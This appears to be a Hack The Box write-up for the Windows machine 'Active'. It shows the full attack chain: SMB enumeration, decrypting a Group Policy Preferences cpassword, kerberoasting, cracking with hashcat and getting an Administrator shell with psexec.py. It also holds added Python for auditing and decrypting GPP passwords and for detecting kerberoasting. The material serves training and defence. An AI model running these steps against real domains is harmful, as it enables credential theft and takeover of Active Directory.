Active - [HTB]

Marmeus


    Introduction

    Active is an easy Windows machine from Hack The Box where the attacker has to dig through the available Windows shares in order to find a Group Policy Preferences credential for a user account in the Active Directory domain. Finally, by kerberoasting we are able to identify a service run as Administrator and obtain the Administrator's Kerberos 5 TGS-REP hash for later password cracking, granting us an interactive shell.

    Enumeration

    As always, let's start by finding all open ports on the machine with nmap.

    kali@kali:~/Documents/HTB/Active$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.100
    Warning: 10.10.10.100 giving up on port because retransmission cap hit (2).
    Nmap scan report for 10.10.10.100
    Host is up (0.049s latency).
    Not shown: 65491 closed ports
    PORT      STATE    SERVICE
    53/tcp    open     domain
    88/tcp    open     kerberos-sec
    135/tcp   open     msrpc
    139/tcp   open     netbios-ssn
    268/tcp   filtered td-replica
    389/tcp   open     ldap
    445/tcp   open     microsoft-ds
    464/tcp   open     kpasswd5
    593/tcp   open     http-rpc-epmap
    636/tcp   open     ldapssl
    [...]
    
    # Nmap done at Sun Jul  4 17:18:50 2021 -- 1 IP address (1 host up) scanned in 88.19 seconds

    Then, we continue with a deeper scan of every open port, getting more information about each service.

    kali@kali:~/Documents/HTB/Active$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 10.10.10.100
    Nmap scan report for 10.10.10.100
    Host is up (0.098s latency).
    
    PORT      STATE SERVICE       VERSION
    53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
    | dns-nsid: 
    |_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
    88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 21:48:03Z)
    135/tcp   open  msrpc         Microsoft Windows RPC
    139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
    389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
    445/tcp   open  microsoft-ds?
    464/tcp   open  kpasswd5?
    593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
    636/tcp   open  tcpwrapped
    3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
    [...]
    Host script results:
    |_clock-skew: 12m34s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2021-07-04T21:49:00
    |_  start_date: 2021-07-04T17:54:09
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sun Jul  4 17:36:31 2021 -- 1 IP address (1 host up) scanned in 70.35 seconds

    Enumerating the Windows shares with smbmap shows that the Replication share is readable without credentials (a null session).

    kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbmap -H 10.10.10.100
    [+] IP: 10.10.10.100:445        Name: 10.10.10.100                                       
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    NO ACCESS       Remote IPC
            NETLOGON                                                NO ACCESS       Logon server share 
            Replication                                             READ ONLY
            SYSVOL                                                  NO ACCESS       Logon server share 
            Users                                                   NO ACCESS
    kali@kali:/media/sf_2_MisPostsBlog/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Sat Jul 21 06:37:44 2018
      ..                                  D        0  Sat Jul 21 06:37:44 2018
      active.htb                          D        0  Sat Jul 21 06:37:44 2018
    
                    10459647 blocks of size 4096. 5728355 blocks available
    
    

    Looking inside, there is a file Groups.xml at \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ (that GUID is the Default Domain Policy, so this share mirrors the SYSVOL policy tree).

    kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Replication -U "%"
    Try "help" to get a list of possible commands.
    smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
    smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
      .                                   D        0  Sat Jul 21 06:37:44 2018
      ..                                  D        0  Sat Jul 21 06:37:44 2018
      Groups.xml                          A      533  Wed Jul 18 16:46:06 2018
    
                    10459647 blocks of size 4096. 5721526 blocks available
    smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
    smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> 

    Exploitation

    This file contains the username active.htb\SVC_TGS and its password in the cpassword attribute, which is encrypted rather than hashed.

    kali@kali:~/Documents/HTB/Active$ cat Groups.xml 
    <?xml version="1.0" encoding="utf-8"?>
    <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
    </Groups>

    The cpassword value is AES-256 encrypted with a static key that Microsoft published in its own documentation (the MS14-025 issue), so anyone who can read the file can recover the plaintext with the following command.

    kali@kali:~/Documents/HTB/Active$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
    GPPstillStandingStrong2k18
    
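The following is an added example, not code from the original write-up: it audits Group Policy Preferences XML for cpassword attributes (Groups.xml here, but also Services.xml, ScheduledTasks.xml and DataSources.xml, which use other account-name attributes) and decrypts them the way gpp-decrypt does, with the static AES key from MS-GPPREF. Decryption assumes pycryptodome is installed; the audit part needs only the standard library.

```python
# Added example (not from the original write-up): audit Group Policy Preferences
# XML for cpassword attributes (the MS14-025 issue) and decrypt them with the
# AES-256 key Microsoft published. Anyone who can read SYSVOL can do the same,
# which is why such files must be removed rather than left in place.
import base64
import xml.etree.ElementTree as ET

# Static key from Microsoft's own documentation (MS-GPPREF 2.2.1.1.4).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
# Attributes that carry the account name in the different GPP XML file types
# (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml).
NAME_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpasswords(xml_text: str):
    """Return (tag, account, cpassword) for every element carrying a cpassword."""
    hits = []
    for elem in ET.fromstring(xml_text.encode("utf-8")).iter():
        cpw = elem.attrib.get("cpassword")
        if cpw is None:
            continue
        account = next((elem.attrib[a] for a in NAME_ATTRS if a in elem.attrib), "?")
        hits.append((elem.tag, account, cpw))
    return hits


def decrypt_cpassword(cpw: str) -> str:
    """AES-256-CBC, zero IV, PKCS#7 padding, UTF-16LE plaintext (needs pycryptodome)."""
    from Crypto.Cipher import AES  # imported lazily: optional dependency
    from Crypto.Util.Padding import unpad
    raw = base64.b64decode(cpw + "=" * (-len(cpw) % 4))  # GPP strips the '=' padding
    plain = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=bytes(16)).decrypt(raw)
    return unpad(plain, AES.block_size).decode("utf-16-le")


# The Groups.xml recovered from the Replication share above.
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\\SVC_TGS"/></User>
</Groups>"""

if __name__ == "__main__":
    for tag, account, cpw in find_cpasswords(GROUPS_XML):
        try:
            shown = decrypt_cpassword(cpw)
        except ImportError:
            shown = "(install pycryptodome to decrypt)"
        print(f"{tag}: {account} -> {shown}")
```

Pointing find_cpasswords at every XML file under a SYSVOL copy is the quick way to audit a domain for leftover GPP passwords.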

    With these credentials we now have read access to the Users share (as well as NETLOGON and SYSVOL).

    kali@kali:~/Documents/HTB/Active$ smbmap -H 10.10.10.100 -u SVC_TGS -p  GPPstillStandingStrong2k18 
    [+] IP: 10.10.10.100:445        Name: active.htb                                        
            Disk                                                    Permissions     Comment
            ----                                                    -----------     -------
            ADMIN$                                                  NO ACCESS       Remote Admin
            C$                                                      NO ACCESS       Default share
            IPC$                                                    NO ACCESS       Remote IPC
            NETLOGON                                                READ ONLY       Logon server share 
            Replication                                             READ ONLY
            SYSVOL                                                  READ ONLY       Logon server share 
            Users                                                   READ ONLY
    
    

    Inside it, we can obtain the user flag from the directory \SVC_TGS\Desktop\.

    kali@kali:~/Documents/HTB/Active$ smbclient //10.10.10.100/Users -U "SVC_TGS%GPPstillStandingStrong2k18"
    smb: \> cd SVC_TGS/Desktop/
    smb: \SVC_TGS\Desktop\> dir
      .                                   D        0  Sat Jul 21 11:14:42 2018
      ..                                  D        0  Sat Jul 21 11:14:42 2018                  
      user.txt   
    
                    10459647 blocks of size 4096. 5721270 blocks available
    smb: \SVC_TGS\Desktop\> get user.txt
    getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
    
    

    Privilege Escalation

    Since we now have domain credentials, we can try kerberoasting with Impacket's GetUserSPNs.py. It asks the domain controller for a TGS ticket for every user account that has an SPN; that ticket is encrypted with the service account's password hash, so it can be cracked offline without ever touching the account.

    kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
    Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
    
    ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
    --------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
    active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783         
    
    [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

    However, the request fails because of the time difference between our machine and the domain controller: Kerberos rejects requests whose timestamp is further from the KDC's clock than the allowed skew (5 minutes by default), and nmap already reported a clock skew of 12m34s. To fix this we only need to sync our clock with the following commands.

    kali@kali:~/Documents/HTB/Active$ sudo apt install ntpdate -y
    kali@kali:~/Documents/HTB/Active$ sudo ntpdate 10.10.10.100
     5 Jul 08:09:15 ntpdate[10305]: step time server 10.10.10.100 offset +754.495116 sec

    Once the clock is in sync, we obtain the Administrator's TGS ticket in hashcat format.

    kali@kali:~/Documents/HTB/Active$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request -save -outputfile GetUserSPNs.txt
    Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
    
    ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
    --------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
    active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783
    
    kali@kali:~/Documents/HTB/Active$ cat GetUserSPNs.txt 
    $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$493a9db3c8618a0037b2e1bec356a0c8$[...]
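From the defender's side, the request above leaves a trace: a Windows Security event 4769 (Kerberos service ticket requested) with encryption type 0x17 (RC4, the etype 23 in the "$krb5tgs$23$" hash) for a user account rather than a machine account. The following is an added example, not code from the original write-up, that flags such requests in constructed 4769 records; the DC$ machine name and the flattened key=value layout are assumptions.

```python
# Added example (not from the original write-up): flag likely kerberoasting in
# Windows Security event 4769 (TGS request) records. Tools like GetUserSPNs.py
# ask for RC4 (etype 0x17 = 23) tickets for user accounts that have an SPN.
from dataclasses import dataclass

RC4_HMAC = 0x17   # etype 23; AES tickets (0x11/0x12) are what normal clients get

@dataclass
class TgsRequest:
    account: str   # TargetUserName: who asked for the ticket
    service: str   # ServiceName: the account that owns the SPN
    etype: int     # TicketEncryptionType
    status: str    # "0x0" on success, otherwise a Kerberos error code

def parse_4769(line: str) -> TgsRequest:
    """Parse a flattened 4769 record of the form key=value,key=value,..."""
    fields = dict(kv.split("=", 1) for kv in line.strip().split(","))
    return TgsRequest(
        account=fields["TargetUserName"],
        service=fields["ServiceName"],
        etype=int(fields["TicketEncryptionType"], 16),
        status=fields["Status"],
    )

def is_kerberoast_candidate(req: TgsRequest) -> bool:
    """A successful RC4 ticket for a non-machine, non-krbtgt service account."""
    if req.status != "0x0" or req.etype != RC4_HMAC:
        return False
    # Machine accounts (name ends in $) and krbtgt produce RC4 noise on older
    # domains; a user-type service account asked for RC4 is the real signal.
    return not (req.service.endswith("$") or req.service.lower() == "krbtgt")

def find_roast_requests(lines):
    reqs = [parse_4769(line) for line in lines if line.strip()]
    return [(r.account, r.service) for r in reqs if is_kerberoast_candidate(r)]

# Constructed sample events modelled on the two GetUserSPNs.py runs above
# (DC$ is a made-up machine account; Status=0x25 is KRB_AP_ERR_SKEW).
SAMPLE_4769 = """
TargetUserName=SVC_TGS@ACTIVE.HTB,ServiceName=Administrator,TicketEncryptionType=0x17,Status=0x0
TargetUserName=SVC_TGS@ACTIVE.HTB,ServiceName=DC$,TicketEncryptionType=0x12,Status=0x0
TargetUserName=SVC_TGS@ACTIVE.HTB,ServiceName=krbtgt,TicketEncryptionType=0x17,Status=0x0
TargetUserName=SVC_TGS@ACTIVE.HTB,ServiceName=Administrator,TicketEncryptionType=0x17,Status=0x25
""".strip().splitlines()

if __name__ == "__main__":
    for account, service in find_roast_requests(SAMPLE_4769):
        print(f"possible kerberoast: {account} requested an RC4 ticket for {service}")
```

Only the successful RC4 request for the Administrator SPN is reported; the AES request for the machine account, the krbtgt ticket and the request that failed with clock skew are ignored.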

    Using hashcat in mode 13100 (Kerberos 5 TGS-REP, etype 23) with the rockyou wordlist we can retrieve the Administrator's password.

    kali@kali:~/Documents/HTB/Active$ hashcat -m 13100 -a 0 GetUserSPNs.txt /usr/share/wordlists/rockyou.txt
    hashcat (v6.1.1) starting...
    
    OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
    =============================================================================================================================                                      
    * Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU
    
    Host memory required for this attack: 134 MB
    
    Dictionary cache hit:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14344385
    * Bytes.....: 139921507                         
    * Keyspace..: 14344385
    
    [....]:Ticketmaster1968
    
    Session..........: hashcat
    Status...........: Cracked
    Hash.Name........: Kerberos 5, etype 23, TGS-REP
    Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...217971
    Time.Started.....: Mon Jul  5 08:12:39 2021 (14 secs)
    Time.Estimated...: Mon Jul  5 08:12:53 2021 (0 secs)
    Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:   753.3 kH/s (7.93ms) @ Accel:64 Loops:1 Thr:64 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 10551296/14344385 (73.56%)
    Rejected.........: 0/10551296 (0.00%)
    Restore.Point....: 10534912/14344385 (73.44%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidates.#1....: Tioncurtis23 -> TUGGIE
    
    Started: Mon Jul  5 08:12:22 2021
    Stopped: Mon Jul  5 08:12:55 2021
    
    

    Finally, in order to obtain an interactive shell as "Administrator" we can use Impacket's psexec.py, which uploads a service binary to the ADMIN$ share and starts it as a Windows service.

    kali@kali:~/Documents/HTB/Active$ psexec.py "active.htb/administrator:Ticketmaster1968"@10.10.10.100
    Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
    
    [*] Requesting shares on 10.10.10.100.....
    [*] Found writable share ADMIN$
    [*] Uploading file ZxHDWdnx.exe
    [*] Opening SVCManager on 10.10.10.100.....
    [*] Creating service RlII on 10.10.10.100.....
    [*] Starting service RlII.....
    [!] Press help for extra shell commands
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Windows\system32>cd C:\Users\Administrator\Desktop
    
    C:\Users\Administrator\Desktop>type root.txt
    [CENSORED]